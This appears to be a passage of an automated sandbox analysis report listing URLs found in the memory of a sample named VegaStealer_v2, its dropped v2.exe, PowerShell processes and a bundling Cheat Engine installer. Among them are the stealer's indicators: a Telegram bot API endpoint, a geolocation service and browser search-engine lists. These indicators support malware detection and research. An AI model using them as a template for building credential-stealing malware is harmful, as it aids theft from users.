00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CheatEngine75.exe, 00000006.00000002.3278514154.0000000002196000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000075AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mcafee.com
Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cx
Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cxx
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000D.00000002.2188691626.000002504DFCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.vimeworld.ru/user/name/
Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUser
Source: CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdf
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdfG
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/FbN
Source: CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/IN
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/l
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/qb
Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.png
Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.pngxgh
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/bdp
Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/g
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/gd
Source: CheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/K
Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.00000000035F9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/
Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000074EF000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/CheatEngine/1032/CheatEngine75.exe
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.png
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pnge
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zip
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zip.png
Source: CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipM32
Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipa_re
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjy
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.png
Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yH
Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzipMSSP
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CEC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zip
Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipEN.png4
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xL
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005C90000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipW
Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipWyx
Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png4
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xL
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/images/943/EN.png
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/images/943/EN.pngZV
Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.000000000363F000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/o
Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/x
Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3303385226.0000000004E30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.0000000003634000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000D7A000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/zbd
Source: CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/zbd:N
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/f/RAV_Triple_NCB/images/DOTPS-855/EN.pngg
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/f/WeatherZero/images/969/EN.png
Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbd
Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbd:NvMUsers
Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgI
Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdv
Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdv
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app
Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://freegeoip.app/xml/9https://api.telegram.org/botGhttps://api.vimeworld.ru/user/name/1--------
Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/novotnyllc/bc-csharp
Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DBA71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
